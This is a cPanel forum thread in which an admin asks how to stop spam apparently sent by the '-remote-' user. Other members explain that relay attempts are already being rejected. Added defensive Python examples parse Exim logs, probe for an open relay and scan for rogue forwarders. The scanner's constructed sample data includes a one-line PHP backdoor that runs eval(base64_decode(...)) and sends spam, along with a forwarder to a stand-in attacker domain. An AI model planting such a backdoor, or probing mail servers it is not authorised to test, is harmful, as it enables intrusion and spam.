SPAM from -Remote- user

Tornado (Active Member, joined Jul 17, 2007, Iran)
Hi,
unfortunately my server is sending a lot of spam from the -remote- user, which I could not find among any of my users...

I don't know how I can stop this.
See the screenshot.

I have been fighting with this for about 40 days.

Sometimes the datacenter suspends my server...

Please help us.

Thanks

[Attachments: Screen Shot 2018-09-28 at 4.10.20 PM.png, Screen Shot 2018-09-28 at 4.10.08 PM.png]
 

keat63 (Well-Known Member, joined Nov 20, 2014, cPanel Access Level: Root Administrator)
While we wait for the experts to come along, do you recognise the 195.201.x.x IP address?

Do you have SPF and DKIM configured for your domain?

keat63 (Well-Known Member, joined Nov 20, 2014, cPanel Access Level: Root Administrator)
Let's see if you are an open relay.

Maybe check the following in WHM.


Tweak Settings >> Mail >> Initial default/catch-all forwarder destination
Change this to 'Fail'
 

sparek-3 (Well-Known Member, joined Aug 10, 2002, cPanel Access Level: Root Administrator)
Yeah, perhaps someone with a better understanding of the Mail Stats feature thingy in cPanel/WHM will be able to help. I don't use that feature, so I really don't understand what is being displayed here.

But outside of that, I would recommend examining the logs for one of the specific message ids listed here, i.e.:

grep 1g5ry3-000AQu-2Q /var/log/exim_mainlog

That's how I diagnose issues like this.

If you copy that information into this thread, be sure to redact any confidential or identifying information.
 

garconcn (Well-Known Member, joined Oct 29, 2009)
Can you click on the "View Message" action on one email, then click "Show Control Data" and check "Mail control Data" to find the cPanel username or email address? That might be the one that got hacked.

In Tweak Settings >> Mail >> Number of emails a domain may send per day before the system sends a notification, change from unlimited to a number; you may get a notification about which account sent lots of emails.

Also, in Tweak Settings, set the following:

Maximum percentage of failed or deferred messages a domain may send per hour: I use 25%
Number of failed or deferred messages a domain may send before protections can be triggered: I use 25

This will stop the user from sending email if they have too many failed messages.
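As an added example (mine, not code from the thread or from cPanel), here is a small Python parser for the kind of exim_mainlog lines that sparek-3's grep pulls out. It ties the two suggestions above together: tracing one message ID to the authenticated account (A=), the local user (U=) or the calling script's working directory, and computing the per-domain failed-or-deferred ratio that garconcn's Tweak Settings thresholds act on. The log lines are constructed; the "cwd=... args:" line reflects how cPanel's Exim logs sendmail invocations as I understand it, and the threshold function is a whole-log approximation of cPanel's per-hour counters, not its implementation.

```python
import re
from collections import defaultdict

# Constructed sample of /var/log/exim_mainlog lines (not from the thread).
# Message IDs, hosts and addresses are made up; IPs are documentation ranges.
SAMPLE_LOG = """\
2018-09-28 15:10:22 1g5ry3-000AQu-2Q <= bob@example.com H=(desktop) [203.0.113.5] P=esmtpsa X=TLSv1.2:ECDHE-RSA-AES256-GCM-SHA384:256 CV=no A=dovecot_login:bob@example.com S=1311 id=abc@desktop T="Invoice" for victim1@hotmail.com
2018-09-28 15:10:23 1g5ry3-000AQu-2Q => victim1@hotmail.com R=dkim_lookuphost T=dkim_remote_smtp H=mx.hotmail.com [198.51.100.7] C="250 OK"
2018-09-28 15:10:23 1g5ry3-000AQu-2Q Completed
2018-09-28 15:11:02 cwd=/home/siteuser/public_html/wp-content/uploads 3 args: /usr/sbin/sendmail -t -i
2018-09-28 15:11:02 1g5ryA-000ATz-1x <= siteuser@srv.example.com U=siteuser P=local S=812 T="Cheap pills" for victim2@outlook.com
2018-09-28 15:11:03 1g5ryA-000ATz-1x ** victim2@outlook.com R=dkim_lookuphost T=dkim_remote_smtp: SMTP error from remote mail server after end of data: 550 5.7.1 Message rejected
2018-09-28 15:11:03 1g5ryA-000ATz-1x Completed
2018-09-28 15:12:00 H=(mail) [192.0.2.9] F=<spammer@evil.example> rejected RCPT <victim3@live.com>: relay not permitted
"""

MSGID = r"[0-9A-Za-z]{6}-[0-9A-Za-z]{6}-[0-9A-Za-z]{2}"
LINE_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) (?:(?P<msgid>" + MSGID + r") )?(?P<rest>.*)$")
ARRIVAL_RE = re.compile(r"^<= (?P<sender><>|\S+)(?P<fields>.*)$")
FIELD_RE = re.compile(r' (?P<k>[A-Z]{1,2})=(?P<v>"[^"]*"|\S+)')  # H= P= A= U= S= T= ...
CWD_RE = re.compile(r"^cwd=(\S+) \d+ args:")                     # cPanel's sendmail-call line
IP_RE = re.compile(r"\[(\d+\.\d+\.\d+\.\d+)\]")


def parse_log(text):
    """Split raw log text into {ts, msgid (or None), rest} records."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            out.append({"ts": m.group("ts"), "msgid": m.group("msgid"), "rest": m.group("rest")})
    return out


def trace_message(text, msgid):
    """Everything the log says about one message: who injected it and what happened."""
    info = {"msgid": msgid, "sender": None, "auth": None, "local_user": None, "client_ip": None,
            "cwd": None, "recipients": [], "delivered": [], "failed": [], "deferred": []}
    last_cwd = None
    for ev in parse_log(text):
        rest = ev["rest"]
        if ev["msgid"] is None:
            m = CWD_RE.match(rest)
            if m:
                last_cwd = m.group(1)
            continue
        cwd_for_this = None
        if rest.startswith("<= ") and " P=local" in rest:
            # Heuristic: the sendmail-invocation line precedes the arrival it caused,
            # so hand the recorded working directory to this message only.
            cwd_for_this, last_cwd = last_cwd, None
        if ev["msgid"] != msgid:
            continue
        if rest.startswith("<= "):
            m = ARRIVAL_RE.match(rest)
            fields = dict(FIELD_RE.findall(m.group("fields")))
            ip = IP_RE.search(rest)
            info.update(sender=m.group("sender"), auth=fields.get("A"), local_user=fields.get("U"),
                        client_ip=ip.group(1) if ip else None, cwd=cwd_for_this)
            if " for " in rest:  # recipients are the last " for " group on the line
                info["recipients"] = rest.rsplit(" for ", 1)[1].split()
        elif rest.startswith("=> "):
            info["delivered"].append(rest.split()[1])
        elif rest.startswith("** "):
            info["failed"].append(rest.split()[1])
        elif rest.startswith("== "):
            info["deferred"].append(rest.split()[1])
    return info


def domain_failure_rates(text):
    """Per sender domain: messages injected and how many had a failed (**) or deferred (==) delivery."""
    sender_domain = {}
    stats = defaultdict(lambda: {"messages": 0, "failed_or_deferred": 0})
    for ev in parse_log(text):
        mid, rest = ev["msgid"], ev["rest"]
        if mid is None:
            continue
        if rest.startswith("<= "):
            sender = ARRIVAL_RE.match(rest).group("sender")
            dom = sender.rsplit("@", 1)[1].lower() if "@" in sender else "(bounce)"
            sender_domain[mid] = dom
            stats[dom]["messages"] += 1
        elif rest.startswith(("** ", "== ")) and mid in sender_domain:
            stats[sender_domain[mid]]["failed_or_deferred"] += 1
    for s in stats.values():
        s["percent"] = round(100.0 * s["failed_or_deferred"] / s["messages"], 1)
    return dict(stats)


def over_threshold(rates, max_percent=25.0, min_failures=25):
    """Domains that would trip the protections with the 25% / 25-message settings above."""
    return sorted(d for d, s in rates.items()
                  if s["failed_or_deferred"] >= min_failures and s["percent"] > max_percent)


def count_relay_rejections(text):
    """Relay attempts Exim refused (no message ID is ever assigned to these)."""
    return sum(1 for ev in parse_log(text) if ev["msgid"] is None
               and "rejected RCPT" in ev["rest"] and "relay not permitted" in ev["rest"])


if __name__ == "__main__":
    for mid in ("1g5ry3-000AQu-2Q", "1g5ryA-000ATz-1x"):
        print(trace_message(SAMPLE_LOG, mid))
    rates = domain_failure_rates(SAMPLE_LOG)
    print(rates, over_threshold(rates, min_failures=1))
    print("relay attempts rejected:", count_relay_rejections(SAMPLE_LOG))
```

On a real server, read /var/log/exim_mainlog into `text` instead of SAMPLE_LOG. The second sample message is the pattern to look for: no A= (nobody authenticated), P=local, and a cwd under a user's public_html uploads directory, which points at a script rather than a mailbox. The relay-rejection line carries no message ID at all, which is why it inflates the "-remote-" failure count without any mail having been sent.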
 

Tornado (Active Member, joined Jul 17, 2007, Iran)
> While we wait for the experts to come along, do you recognise the 195.201.x.x IP address?
>
> Do you have SPF and DKIM configured for your domain?

Hi,
it's our main IP.

> Let's see if you are an open relay.
>
> Maybe check the following in WHM.
>
> Tweak Settings >> Mail >> Initial default/catch-all forwarder destination
> Change this to 'Fail'

It's already set to Fail.

Every email is sent from:
Sender User: -remote-

I want to stop sending email from the -remote- user.

How can I stop it?
 

rpvw (Well-Known Member, joined Jul 18, 2013, UK, cPanel Access Level: Root Administrator)
I would think twice before you disallow remote senders - it may have the consequence that no one will be able to send legitimate mail to any of the domains hosted on your server.

To test if your server is an open relay use the following website:
Email Server Test - Online SMTP diagnostics tool - MxToolbox

Check for the SMTP Open Relay line - if it says OK - Not an open relay - you are fine.

As long as your server is not an open relay, your mail system looks as if it is doing what it was designed to do - rejecting relay attempts.

See Tweak Settings - Mail - Version 74 Documentation - cPanel Documentation and ensure you have followed all the security suggestions, notes and warnings.

You may also like to check the various Tweak Settings for the word spam, as well as the Exim Configuration Manager (the default values are always a good place to start) and you may want to consider enabling and configuring:
Scan outgoing messages for spam and reject based on defined Apache SpamAssassin™ score (Minimum: 0.1; Maximum: 99.9)

Hope this helps
 
Reactions: Tornado
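As an added example (mine, not from the thread and not the MxToolbox tool), the relay check rpvw describes can be written as an SMTP exchange you control: an unauthenticated MAIL FROM an outside domain followed by RCPT TO another outside domain. A correctly configured server answers the RCPT with a 5xx such as "550 relay not permitted"; a 250 means it is an open relay. To keep the block runnable offline it includes a tiny fake SMTP server standing in for a correctly configured Exim; fake.example.com, example.com and the probe addresses are constructed. Pointing relay_probe at a real host on port 25 tests a live server (only one you are authorised to test).

```python
import smtplib
import socketserver
import threading

# Domains the fake server treats as local (constructed for this example).
LOCAL_DOMAINS = {"example.com"}


class FakeSmtpHandler(socketserver.StreamRequestHandler):
    """Test double for a correctly configured MTA: accepts RCPT TO for local
    domains and answers 550 'relay not permitted' for everything else."""

    def handle(self):
        self.wfile.write(b"220 fake.example.com ESMTP\r\n")
        while True:
            line = self.rfile.readline()
            if not line:
                return
            cmd = line.decode("latin-1").strip()
            verb = cmd.split(" ", 1)[0].upper()
            if verb in ("EHLO", "HELO"):
                self.wfile.write(b"250-fake.example.com\r\n250 OK\r\n")
            elif verb in ("MAIL", "RSET", "NOOP"):
                self.wfile.write(b"250 OK\r\n")
            elif verb == "RCPT":
                # "RCPT TO:<user@domain>" -> decide purely on the recipient domain,
                # exactly the decision an MTA makes for an unauthenticated client.
                addr = cmd.split(":", 1)[1].strip().strip("<>")
                if addr.rsplit("@", 1)[-1].lower() in LOCAL_DOMAINS:
                    self.wfile.write(b"250 Accepted\r\n")
                else:
                    self.wfile.write(b"550 relay not permitted\r\n")
            elif verb == "QUIT":
                self.wfile.write(b"221 Bye\r\n")
                return
            else:
                self.wfile.write(b"502 command not implemented\r\n")


def start_fake_server():
    """Start the test double on an ephemeral localhost port; returns (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakeSmtpHandler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def relay_probe(host, port, mail_from="spammer@evil.example",
                rcpt_to="victim@other.example", timeout=10):
    """The classic open-relay probe: outside sender to outside recipient, no
    authentication. Returns the (code, text) reply to RCPT TO."""
    with smtplib.SMTP(host, port, local_hostname="probe.example", timeout=timeout) as smtp:
        smtp.ehlo()
        smtp.mail(mail_from)
        code, msg = smtp.rcpt(rcpt_to)
    return code, msg.decode("latin-1", "replace")


def is_open_relay(host, port):
    """True only if the server accepts a recipient it is not responsible for."""
    code, _ = relay_probe(host, port)
    return 200 <= code < 300


if __name__ == "__main__":
    server, port = start_fake_server()
    try:
        print("external recipient:", relay_probe("127.0.0.1", port))
        print("local recipient:", relay_probe("127.0.0.1", port, rcpt_to="bob@example.com"))
        print("open relay?", is_open_relay("127.0.0.1", port))
    finally:
        server.shutdown()
        server.server_close()
```

The 550 on the external recipient is the same event the thread's screenshots count as a "-remote-" failure: the connection was refused at RCPT, nothing was queued, and the only cost is a log line. The 250 on the local recipient is what rpvw means by remote mail you cannot turn off without stopping inbound delivery altogether.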

rpvw (Well-Known Member, joined Jul 18, 2013, UK, cPanel Access Level: Root Administrator)
I had another thought:

Check that no-one has configured a forwarder that shouldn't be there - we have seen several cases of email accounts having been hacked and forwarders set up for the purpose of spamming from supposedly legitimate accounts.

You might also want to check that your users have not had any scripts injected or uploaded to their /public_html space that might trigger a mail event from a specially crafted browser request.

Good luck
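As an added example (mine, not from the thread or from cPanel) of the two checks rpvw lists: a Python scan of forwarder files for destinations that leave the server or pipe into a script, and a scan of a web root for PHP files that can send mail, flagging those whose recipient comes straight from the request or that also carry eval(base64_decode(...)). The file contents are constructed; /etc/valiases/<domain> and /home/<user>/public_html are the cPanel locations as I know them, and both are passed in as parameters rather than hard-coded.

```python
import os
import re
import tempfile

# Constructed sample data (not from the thread). On a cPanel server the real
# locations are /etc/valiases/<domain> (forwarders) and /home/<user>/public_html.
SAMPLE_VALIASES = {
    "example.com": (
        "*: :fail: No Such User Here\n"
        "alice@example.com: alice@example.com, collector@evil.example\n"
        "sales@example.com: bob@example.com\n"
    ),
    "shop.example": (
        "*: :blackhole:\n"
        "orders@shop.example: \"|/home/shop/mail/handler.php\"\n"
    ),
}
SAMPLE_PUBLIC_HTML = {
    "index.php": "<?php echo 'hello'; ?>\n",
    "contact.php": "<?php if ($_POST) { mail('owner@example.com', 'Contact', $_POST['msg']); } ?>\n",
    "wp-content/uploads/cache.php":
        "<?php eval(base64_decode($_POST['x'])); mail($_GET['to'], $_GET['s'], $_GET['b']); ?>\n",
}

MAIL_CALL = re.compile(r"\b(?:mail|mb_send_mail)\s*\(")
REQUEST_ARG = re.compile(r"\b(?:mail|mb_send_mail)\s*\(\s*\$_(?:GET|POST|REQUEST)\b")
OBFUSCATED = re.compile(r"\b(?:eval|assert)\s*\(\s*(?:base64_decode|gzinflate|str_rot13)\s*\(")


def make_sample_tree():
    """Write the constructed files into a fresh temp dir; returns its path."""
    base = tempfile.mkdtemp(prefix="mailaudit-")
    for sub, files in (("valiases", SAMPLE_VALIASES), ("public_html", SAMPLE_PUBLIC_HTML)):
        for rel, content in files.items():
            path = os.path.join(base, sub, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w") as f:
                f.write(content)
    return base


def find_suspicious_forwarders(valiases_dir, local_domains):
    """(file, address, destination, kind) for each forwarder that sends mail
    off-server ('external') or into a program ('pipe'). Lines use the valiases
    format 'address: dest[, dest...]'; :fail:/:blackhole: style targets are skipped."""
    hits = []
    for name in sorted(os.listdir(valiases_dir)):
        with open(os.path.join(valiases_dir, name)) as f:
            for line in f:
                if ":" not in line:
                    continue
                address, dests = line.split(":", 1)
                for dest in dests.split(","):
                    dest = dest.strip().strip('"')
                    if not dest or dest.startswith(":"):
                        continue
                    if dest.startswith("|"):
                        hits.append((name, address.strip(), dest[1:], "pipe"))
                    elif "@" in dest and dest.rsplit("@", 1)[1].lower() not in local_domains:
                        hits.append((name, address.strip(), dest, "external"))
    return hits


def find_mailing_scripts(docroot):
    """Relative path -> set of flags for PHP files that can send mail.
    'request_controlled' and 'obfuscated' are the ones to read first."""
    findings = {}
    for dirpath, _, files in os.walk(docroot):
        for fn in files:
            if not fn.endswith((".php", ".phtml", ".php5")):
                continue
            full = os.path.join(dirpath, fn)
            with open(full, errors="replace") as f:
                src = f.read()
            if not MAIL_CALL.search(src):
                continue
            flags = {"mail"}
            if REQUEST_ARG.search(src):
                flags.add("request_controlled")
            if OBFUSCATED.search(src):
                flags.add("obfuscated")
            findings[os.path.relpath(full, docroot)] = flags
    return findings


if __name__ == "__main__":
    base = make_sample_tree()
    for hit in find_suspicious_forwarders(os.path.join(base, "valiases"), {"example.com", "shop.example"}):
        print("forwarder:", hit)
    for path, flags in sorted(find_mailing_scripts(os.path.join(base, "public_html")).items()):
        print("script:", path, sorted(flags))
```

The local_domains set should be every domain the server hosts, so that a forwarder to another local mailbox is not reported. A contact form that calls mail() with a fixed recipient is normal; a file under an uploads directory that takes the recipient from $_GET is the "specially crafted browser request" case rpvw describes, and is worth pulling the Exim cwd for.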
 

kdean (Well-Known Member, joined Oct 19, 2012, Orlando, FL, cPanel Access Level: Root Administrator)
I'm confused. His screenshots show that the server is already rejecting the relay attempts, so everything is good. So, what's the problem?

Remote is any email coming in from outside the server, so you can't block that. Remote senders trying to relay through your server to another remote address are being rejected (22,957), so that's correct.

The 64 successful ones are likely local deliveries/incoming mail.
 

Tornado (Active Member, joined Jul 17, 2007, Iran)
> I had another thought:
>
> Check that no-one has configured a forwarder that shouldn't be there - we have seen several cases of email accounts having been hacked and forwarders set up for the purpose of spamming from supposedly legitimate accounts.
>
> You might also want to check that your users have not had any scripts injected or uploaded to their /public_html space that might trigger a mail event from a specially crafted browser request.
>
> Good luck

Hi,
how can I find which users have set forwarders?

> To add, turn on your Authentication column and it will tell you "unauthorized", "localdelivery" or "forwarder".

From where can I turn on Authentication?
 

Tornado (Active Member, joined Jul 17, 2007, Iran)
Hi,
thanks guys.
Is it possible to completely disable sending email from the remote user?

Because I feel someone is using our mail server as remote.
 

rpvw (Well-Known Member, joined Jul 18, 2013, UK, cPanel Access Level: Root Administrator)
If you are going to disable remote mail (which is ALL mail sent TO your server) - you may as well just stop the mail daemons, and use some external mailer service.

We seem to be going around in circles with you asking the same question over and over again. I am sorry if you don't like the answers, but they are unlikely to change to something you want to hear.

Since you don't seem to have got a grip on this at all, I suggest you retain the services of a server administrator to help you - see System Administration Services | cPanel Forums for available services

If you want to continue to learn about preventing mail abuse - this is a good place to start - How to Prevent Email Abuse - cPanel Knowledge Base - cPanel Documentation
 
Reactions: cPanelLauren

kdean (Well-Known Member, joined Oct 19, 2012, Orlando, FL, cPanel Access Level: Root Administrator)
> Hi,
> thanks guys.
> Is it possible to completely disable sending email from the remote user?
>
> Because I feel someone is using our mail server as remote.

In the evidence you've shown so far, attempts to use your server as a relay are being rejected. This is correct. Spammers will continue to try, but it won't work. So unless you show evidence of spam emails being sent through your server by a local account or script. Not all errors in the mail log are bad. Some, and many in your case, are indicating the correct response to relay attempts.
 
Reactions: Tornado and rpvw

Tornado (Active Member, joined Jul 17, 2007, Iran)
Hi,
finally today the datacenter contacted us and sent a warning:

==
It has come to our attention that the IP address of a server you have with us is sending emails to Microsoft accounts (live.com, outlook.com, hotmail.com and msn.com), and that these emails are being marked as spam by the recipients.
==
Here are the logs:

- Removed -
 
Last edited by a moderator:

cPanelLauren (Product Owner, Staff member, joined Nov 14, 2017, Houston)
The answers provided in this thread are pretty comprehensive, but @Tornado, if you're still experiencing issues please open a ticket using the link in my signature. Once open, please reply with the Ticket ID here so that we can update this thread with the resolution once the ticket is resolved.


Thanks!